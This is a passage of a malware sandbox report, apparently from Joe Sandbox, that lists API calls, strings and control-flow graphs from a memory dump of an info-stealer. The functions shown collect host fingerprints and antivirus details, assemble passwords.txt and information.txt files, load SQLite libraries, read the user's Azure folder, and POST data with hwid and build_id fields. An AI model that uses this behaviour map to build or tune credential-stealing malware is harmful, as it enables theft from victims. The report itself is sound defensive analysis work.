                                                                                                        • GetProcAddress.KERNEL32(76E80000,004184C2), ref: 0041892D
                                                                                                        • GetProcAddress.KERNEL32 ref: 00418944
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AddressProc$LibraryLoad

                                                                                                        Control-flow Graph (graph not reproduced; first node 839 spans 413b86-4145a5)
                                                                                                        APIs
                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                          • Part of subcall function 00410CC0: GetProcessHeap.KERNEL32(00000000,00000104,?,Version: ,004365B6,?,?,?), ref: 00410CD8
                                                                                                          • Part of subcall function 00410CC0: HeapAlloc.KERNEL32(00000000), ref: 00410CDF
                                                                                                          • Part of subcall function 00410CC0: GetLocalTime.KERNEL32(?), ref: 00410CEB
                                                                                                          • Part of subcall function 00410CC0: wsprintfA.USER32 ref: 00410D16
                                                                                                          • Part of subcall function 004115D4: _memset.LIBCMT ref: 00411607
                                                                                                          • Part of subcall function 004115D4: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?,?,?,?), ref: 00411626
                                                                                                          • Part of subcall function 004115D4: RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,000000FF,?,?,?), ref: 0041164B
                                                                                                          • Part of subcall function 004115D4: CharToOemA.USER32(?,?), ref: 0041166B
                                                                                                          • Part of subcall function 00411684: GetCurrentHwProfileA.ADVAPI32(?), ref: 0041169F
                                                                                                          • Part of subcall function 00411684: _memset.LIBCMT ref: 004116CE
                                                                                                          • Part of subcall function 00411684: lstrcatA.KERNEL32(?,00000000,?,?,?,?,?), ref: 004116F6
                                                                                                          • Part of subcall function 00411684: lstrcatA.KERNEL32(?,00436ECC,?,?,?,?,?), ref: 00411713
                                                                                                          • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                          • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                          • Part of subcall function 004109A2: GetWindowsDirectoryA.KERNEL32(?,00000104,?,?,00000000), ref: 004109D5
                                                                                                          • Part of subcall function 004109A2: GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00410A15
                                                                                                          • Part of subcall function 004109A2: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 00410A6A
                                                                                                          • Part of subcall function 004109A2: HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410A71
                                                                                                        • GetCurrentProcessId.KERNEL32(Path: ,0043687C,HWID: ,00436870,GUID: ,00436864,00000000,MachineID: ,00436854,00000000,Date: ,00436848,00436844,004379AC,Version: ,004365B6), ref: 00413DDB
                                                                                                          • Part of subcall function 0041224A: OpenProcess.KERNEL32(00000410,00000000,=A,00000000,?), ref: 0041226C
                                                                                                          • Part of subcall function 0041224A: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00412287
                                                                                                          • Part of subcall function 0041224A: CloseHandle.KERNEL32(00000000), ref: 0041228E
                                                                                                          • Part of subcall function 00410B30: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B44
                                                                                                          • Part of subcall function 00410B30: HeapAlloc.KERNEL32(00000000,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B4B
                                                                                                          • Part of subcall function 00411807: __EH_prolog3_catch_GS.LIBCMT ref: 0041180E
                                                                                                          • Part of subcall function 00411807: CoInitializeEx.OLE32(00000000,00000000,0000004C,00413EF9,Install Date: ,004368B0,00000000,Windows: ,004368A0,Work Dir: In memory,00436888), ref: 0041181F
                                                                                                          • Part of subcall function 00411807: CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00411830
                                                                                                          • Part of subcall function 00411807: CoCreateInstance.OLE32(00432F00,00000000,00000001,00432E30,?), ref: 0041184A
                                                                                                          • Part of subcall function 00411807: CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00411880
                                                                                                          • Part of subcall function 00411807: VariantInit.OLEAUT32(?), ref: 004118DB
                                                                                                          • Part of subcall function 00411997: __EH_prolog3_catch.LIBCMT ref: 0041199E
                                                                                                          • Part of subcall function 00411997: CoInitializeEx.OLE32(00000000,00000000,00000030,00413F67,?,AV: ,004368C4,Install Date: ,004368B0,00000000,Windows: ,004368A0,Work Dir: In memory,00436888), ref: 004119AD
                                                                                                          • Part of subcall function 00411997: CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 004119BE
                                                                                                          • Part of subcall function 00411997: CoCreateInstance.OLE32(00432F00,00000000,00000001,00432E30,?), ref: 004119D8
                                                                                                          • Part of subcall function 00411997: CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00411A0E
                                                                                                          • Part of subcall function 00411997: VariantInit.OLEAUT32(?), ref: 00411A5D
                                                                                                          • Part of subcall function 00410C85: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00401385), ref: 00410C91
                                                                                                          • Part of subcall function 00410C85: HeapAlloc.KERNEL32(00000000,?,?,?,00401385), ref: 00410C98
                                                                                                          • Part of subcall function 00410C85: GetComputerNameA.KERNEL32(00000000,00401385), ref: 00410CAC
                                                                                                          • Part of subcall function 00410C53: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004013B9), ref: 00410C5F
                                                                                                          • Part of subcall function 00410C53: HeapAlloc.KERNEL32(00000000,?,?,?,004013B9), ref: 00410C66
                                                                                                          • Part of subcall function 00410C53: GetUserNameA.ADVAPI32(00000000,004013B9), ref: 00410C7A
                                                                                                          • Part of subcall function 00411563: CreateDCA.GDI32(00000000,00000000,00000000,00000000), ref: 00411575
                                                                                                          • Part of subcall function 00411563: GetDeviceCaps.GDI32(00000000,00000008), ref: 00411580
                                                                                                          • Part of subcall function 00411563: GetDeviceCaps.GDI32(00000000,0000000A), ref: 0041158B
                                                                                                          • Part of subcall function 00411563: ReleaseDC.USER32(00000000,00000000), ref: 00411596
                                                                                                          • Part of subcall function 00411563: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00414098,?,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000,Computer Name: ,004368D0,AV: ,004368C4), ref: 004115A2
                                                                                                          • Part of subcall function 00411563: HeapAlloc.KERNEL32(00000000,?,?,00414098,?,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000,Computer Name: ,004368D0,AV: ,004368C4,Install Date: ), ref: 004115A9
                                                                                                          • Part of subcall function 00411563: wsprintfA.USER32 ref: 004115BB
                                                                                                          • Part of subcall function 00410DDB: GetKeyboardLayoutList.USER32(00000000,00000000,0043670D,?,?), ref: 00410E0C
                                                                                                          • Part of subcall function 00410DDB: LocalAlloc.KERNEL32(00000040,00000000), ref: 00410E1A
                                                                                                          • Part of subcall function 00410DDB: GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00410E28
                                                                                                          • Part of subcall function 00410DDB: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,00000000), ref: 00410E57
                                                                                                          • Part of subcall function 00410DDB: LocalFree.KERNEL32(00000000), ref: 00410EFF
                                                                                                          • Part of subcall function 00410D2E: GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00410D49
                                                                                                          • Part of subcall function 00410D2E: HeapAlloc.KERNEL32(00000000), ref: 00410D50
                                                                                                          • Part of subcall function 00410D2E: GetTimeZoneInformation.KERNEL32(?), ref: 00410D5F
                                                                                                          • Part of subcall function 00410D2E: wsprintfA.USER32 ref: 00410D7D
                                                                                                          • Part of subcall function 00410F51: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ,0043692C), ref: 00410F65
                                                                                                          • Part of subcall function 00410F51: HeapAlloc.KERNEL32(00000000,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ,0043692C,Keyboard Languages: ,00436910), ref: 00410F6C
                                                                                                          • Part of subcall function 00410F51: RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00436888,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ), ref: 00410F8A
                                                                                                          • Part of subcall function 00410F51: RegQueryValueExA.KERNEL32(00436888,00000000,00000000,00000000,000000FF,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000), ref: 00410FA6
                                                                                                          • Part of subcall function 00411007: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,?), ref: 0041107D
                                                                                                          • Part of subcall function 00411007: wsprintfA.USER32 ref: 004110DB
                                                                                                          • Part of subcall function 00410FBA: GetSystemInfo.KERNEL32(?), ref: 00410FD4
                                                                                                          • Part of subcall function 00410FBA: wsprintfA.USER32 ref: 00410FEC
                                                                                                          • Part of subcall function 00411119: GetProcessHeap.KERNEL32(00000000,00000104,?,Keyboard Languages: ,00436910,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000,Computer Name: ,004368D0,AV: ,004368C4,Install Date: ), ref: 00411131
                                                                                                          • Part of subcall function 00411119: HeapAlloc.KERNEL32(00000000), ref: 00411138
                                                                                                          • Part of subcall function 00411119: GlobalMemoryStatusEx.KERNEL32(?,?,00000040), ref: 00411154
                                                                                                          • Part of subcall function 00411119: wsprintfA.USER32 ref: 0041117A
                                                                                                          • Part of subcall function 00411192: EnumDisplayDevicesA.USER32(00000000,00000000,?,00000001), ref: 004111E9
                                                                                                          • Part of subcall function 004114A5: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00436712,?,?), ref: 004114D4
                                                                                                          • Part of subcall function 004114A5: Process32First.KERNEL32(00000000,00000128), ref: 004114E4
                                                                                                          • Part of subcall function 004114A5: Process32Next.KERNEL32(00000000,00000128), ref: 00411542
                                                                                                          • Part of subcall function 004114A5: CloseHandle.KERNEL32(00000000), ref: 0041154D
                                                                                                          • Part of subcall function 00411203: RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,0043670F,00000000,?,?), ref: 00411273
                                                                                                          • Part of subcall function 00411203: RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 004112B0
                                                                                                          • Part of subcall function 00411203: wsprintfA.USER32 ref: 004112DD
                                                                                                          • Part of subcall function 00411203: RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 004112FC
                                                                                                          • Part of subcall function 00411203: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 00411332
                                                                                                          • Part of subcall function 00411203: lstrlenA.KERNEL32(?), ref: 00411347
                                                                                                          • Part of subcall function 00411203: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,?,00436E8C), ref: 004113DC
                                                                                                        • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,Keyboard Languages: ,00436910,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000), ref: 00414563
                                                                                                          • Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
                                                                                                          • Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Heap$Process$Alloc$wsprintf$CreateOpen$InitializeQueryValuelstrcatlstrcpy$InformationLocalNamelstrlen$BlanketCapsCloseCurrentDeviceEnumHandleInfoInitInstanceKeyboardLayoutListProcess32ProxySecurityTimeVariant_memset$CharComputerDevicesDirectoryDisplayFileFirstFreeGlobalH_prolog3_catchH_prolog3_catch_LocaleLogicalMemoryModuleNextObjectProcessorProfileReleaseSingleSnapshotStatusSystemThreadToolhelp32UserVolumeWaitWindowsZone
                                                                                                        • String ID: AV: $Computer Name: $Cores: $Date: $Display Resolution: $GUID: $HWID: $Install Date: $Keyboard Languages: $Local Time: $MachineID: $Path: $Processor: $RAM: $Threads: $TimeZone: $User Name: $Version: $VideoCard: $Windows: $Work Dir: In memory$[Hardware]$[Processes]$[Software]$information.txt
                                                                                                        • API String ID: 681701770-1014693891
                                                                                                        • Opcode ID: 6126670baf250b2cd161e8f14be422fa99acf7c1130f51379d98b343847bea79
                                                                                                        • Instruction ID: 792dbb826b946587ba76db5a11b028a2a1d9662385358a0031bce88e61b043bf
                                                                                                        • Opcode Fuzzy Hash: 6126670baf250b2cd161e8f14be422fa99acf7c1130f51379d98b343847bea79
                                                                                                        • Instruction Fuzzy Hash: 2A527D71D4001EAACF01FBA2DD429DDB7B5AF04308F51456BB610771A1DBB87E8E8B98

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                          • Part of subcall function 00410549: lstrlenA.KERNEL32(?,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 0041054F
                                                                                                          • Part of subcall function 00410549: lstrcpyA.KERNEL32(00000000,00000000,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 00410581
                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                          • Part of subcall function 004168C6: StrCmpCA.SHLWAPI(?,ERROR), ref: 0041691A
                                                                                                          • Part of subcall function 004168C6: lstrlenA.KERNEL32(?), ref: 00416925
                                                                                                          • Part of subcall function 004168C6: StrStrA.SHLWAPI(00000000,?), ref: 0041693A
                                                                                                          • Part of subcall function 004168C6: lstrlenA.KERNEL32(?), ref: 00416949
                                                                                                          • Part of subcall function 004168C6: lstrlenA.KERNEL32(00000000), ref: 00416962
                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                        • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416AA0
                                                                                                        • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416AF9
                                                                                                        • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416B59
                                                                                                        • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416BB2
                                                                                                        • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416BC8
                                                                                                        • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416BDE
                                                                                                        • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416BF0
                                                                                                        • Sleep.KERNEL32(0000EA60), ref: 00416BFF
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: lstrlen$lstrcpy$Sleep
                                                                                                        • String ID: .vA$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0$Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0$sqlite3.dll$sqlite3.dll$sqlp.dll$sqlp.dll
                                                                                                        • API String ID: 2840494320-4129404369
                                                                                                        • Opcode ID: a45e317464bf1edbde2a90d5a52dd523743f320969f0b5af628d37bda6730293
                                                                                                        • Instruction ID: 3295cb3038e640ef7bf1334207e300efc9412b34fd4a8ee3f001cefdb945b7ae
                                                                                                        • Opcode Fuzzy Hash: a45e317464bf1edbde2a90d5a52dd523743f320969f0b5af628d37bda6730293
                                                                                                        • Instruction Fuzzy Hash: A9915F31E40119ABCF10FBA6ED47ACC7770AF04308F51502BF915B7191DBB8AE898B98

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                          • Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79
                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                          • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                          • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                        • CopyFileA.KERNEL32(?,?,00000001,00437198,004367C6,?,?,?), ref: 004085D3
                                                                                                        • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00408628
                                                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 0040862F
                                                                                                        • lstrlenA.KERNEL32(?), ref: 004086CB
                                                                                                        • lstrcatA.KERNEL32(?), ref: 004086E4
                                                                                                        • lstrcatA.KERNEL32(?,?), ref: 004086EE
                                                                                                        • lstrcatA.KERNEL32(?,0043719C), ref: 004086FA
                                                                                                        • lstrcatA.KERNEL32(?,?), ref: 00408704
                                                                                                        • lstrcatA.KERNEL32(?,004371A0), ref: 00408710
                                                                                                        • lstrcatA.KERNEL32(?), ref: 0040871D
                                                                                                        • lstrcatA.KERNEL32(?,?), ref: 00408727
                                                                                                        • lstrcatA.KERNEL32(?,004371A4), ref: 00408733
                                                                                                        • lstrcatA.KERNEL32(?), ref: 00408740
                                                                                                        • lstrcatA.KERNEL32(?,?), ref: 0040874A
                                                                                                        • lstrcatA.KERNEL32(?,004371A8), ref: 00408756
                                                                                                        • lstrcatA.KERNEL32(?), ref: 00408763
                                                                                                        • lstrcatA.KERNEL32(?,?), ref: 0040876D
                                                                                                        • lstrcatA.KERNEL32(?,004371AC), ref: 00408779
                                                                                                        • lstrcatA.KERNEL32(?,004371B0), ref: 00408785
                                                                                                        • lstrlenA.KERNEL32(?), ref: 004087BE
                                                                                                        • DeleteFileA.KERNEL32(?), ref: 0040880B
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                                                                                        • String ID: passwords.txt
                                                                                                        • API String ID: 1956182324-347816968
                                                                                                        • Opcode ID: e79cd5a6fe499fb7965201bd0776ad43c7a927167085e3e7bd657c15f75794a8
                                                                                                        • Instruction ID: 9a12f6b0eacbcb2ed4cda68e664cf834d7366407d3e9ed4d657f0b87806d2d42
                                                                                                        • Opcode Fuzzy Hash: e79cd5a6fe499fb7965201bd0776ad43c7a927167085e3e7bd657c15f75794a8
                                                                                                        • Instruction Fuzzy Hash: A2814032900208AFCF05FFA1EE4A9CD7B76BF08316F205026F501B31A1EB7A5E559B59

                                                                                                        Control-flow Graph

                                                                                                        control_flow_graph 2263 404b2e-404bf3 call 410519 call 404ab6 call 4104e7 * 5 InternetOpenA StrCmpCA 2278 404bf5 2263->2278 2279 404bfb-404c01 2263->2279 2278->2279 2280 405194-405236 InternetCloseHandle call 402920 * 8 call 41d016 2279->2280 2281 404c07-404d91 call 411c4a call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 4105c7 call 41058d call 402920 * 2 InternetConnectA 2279->2281 2281->2280 2350 404d97-404dd1 HttpOpenRequestA 2281->2350 2351 404dd7-404ddd 2350->2351 2352 405188-40518e InternetCloseHandle 2350->2352 2353 404dfb-40511a call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 4104e7 call 4105c7 * 2 call 41058d call 402920 * 2 lstrlenA * 2 HttpSendRequestA 2351->2353 2354 404ddf-404df5 InternetSetOptionA 2351->2354 2352->2280 2457 40515c-405174 InternetReadFile 2353->2457 2354->2353 2458 405176-405183 InternetCloseHandle call 402920 2457->2458 2459 40511c-405124 2457->2459 2458->2352 2459->2458 2460 405126-405157 call 410609 call 41058d call 402920 2459->2460 2460->2457
                                                                                                        APIs
                                                                                                          • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                          • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
                                                                                                          • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
                                                                                                          • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
                                                                                                          • Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
                                                                                                          • Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E
                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                        • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00404BCD
                                                                                                        • StrCmpCA.SHLWAPI(?), ref: 00404BEB
                                                                                                        • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404D83
                                                                                                        • HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 00404DC7
                                                                                                        • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00404DF5
                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                          • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                          • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                        • lstrlenA.KERNEL32(?,00436953,",build_id,004377C4,------,004377B8,",hwid,004377A4,------), ref: 004050EE
                                                                                                        • lstrlenA.KERNEL32(?,?,00000000), ref: 00405101
                                                                                                        • HttpSendRequestA.WININET(00000000,?,00000000), ref: 0040510F
                                                                                                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0040516C
                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00405177
                                                                                                        • InternetCloseHandle.WININET(?), ref: 0040518E
                                                                                                        • InternetCloseHandle.WININET(?), ref: 0040519A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileOptionReadSend
                                                                                                        • String ID: "$"$------$------$------$8wA$build_id$hwid
                                                                                                        • API String ID: 3006978581-858375883
                                                                                                        • Opcode ID: b105060c4e4bbf32865d800b87946fda209dabeebbd94f0e8d26b4a58616715d
                                                                                                        • Instruction ID: 7219792e9a540e442724c4d24598c6325e7ae8fa207a63d5b21e459a2de286cb
                                                                                                        • Opcode Fuzzy Hash: b105060c4e4bbf32865d800b87946fda209dabeebbd94f0e8d26b4a58616715d
                                                                                                        • Instruction Fuzzy Hash: C002C371D5512A9ACF20EB21CD46ADDB7B5FF04308F4140E6A54873191DAB87ECA8FD8

                                                                                                        [Control-flow graph of the routine starting at 0x401666; legend: executed / not executed]
                                                                                                        APIs
                                                                                                        • GetTempPathW.KERNEL32(00000104,?), ref: 00401696
                                                                                                        • wsprintfW.USER32 ref: 004016BC
                                                                                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000100,00000000), ref: 004016E6
                                                                                                        • GetProcessHeap.KERNEL32(00000008,000FFFFF), ref: 004016FE
                                                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00401705
                                                                                                        • _time64.MSVCRT ref: 0040170E
                                                                                                        • srand.MSVCRT ref: 00401715
                                                                                                        • rand.MSVCRT ref: 0040171E
                                                                                                        • _memset.LIBCMT ref: 0040172E
                                                                                                        • WriteFile.KERNEL32(?,00000000,000FFFFF,?,00000000), ref: 00401746
                                                                                                        • _memset.LIBCMT ref: 00401763
                                                                                                        • CloseHandle.KERNEL32(?), ref: 00401771
                                                                                                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,04000100,00000000), ref: 0040178D
                                                                                                        • ReadFile.KERNEL32(00000000,00000000,000FFFFF,?,00000000), ref: 004017A9
                                                                                                        • _memset.LIBCMT ref: 004017BE
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004017C8
                                                                                                        • RtlFreeHeap.NTDLL(00000000), ref: 004017CF
                                                                                                        • CloseHandle.KERNEL32(?), ref: 004017DB
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID: FileHeap$_memset$CloseCreateHandleProcess$AllocateFreePathReadTempWrite_time64randsrandwsprintf
                                                                                                        • String ID: %s%s$delays.tmp
                                                                                                        • API String ID: 1620473967-1413376734
                                                                                                        • Opcode ID: 5943a0df419b2f97d08efb2acebaf1400ff012adf14d9747056922950aa0c363
                                                                                                        • Instruction ID: 11c0bd3ed3d7e6805384e8c578cb98533790a078e52b8311c5bcc7c05517a4c3
                                                                                                        • Opcode Fuzzy Hash: 5943a0df419b2f97d08efb2acebaf1400ff012adf14d9747056922950aa0c363
                                                                                                        • Instruction Fuzzy Hash: 2B41C8B1900218ABD7205F61AC4CF9F7B7DEB89715F1006BAF109E10A1DA354E54CF28
                                                                                                        APIs
                                                                                                        • _memset.LIBCMT ref: 004164E2
                                                                                                          • Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD
                                                                                                        • lstrcatA.KERNEL32(?,00000000,?,00000000,?), ref: 00416501
                                                                                                        • lstrcatA.KERNEL32(?,\.azure\), ref: 0041651E
                                                                                                          • Part of subcall function 00415FD1: wsprintfA.USER32 ref: 00416018
                                                                                                          • Part of subcall function 00415FD1: FindFirstFileA.KERNEL32(?,?), ref: 0041602F
                                                                                                          • Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436AB4), ref: 00416050
                                                                                                          • Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436AB8), ref: 0041606A
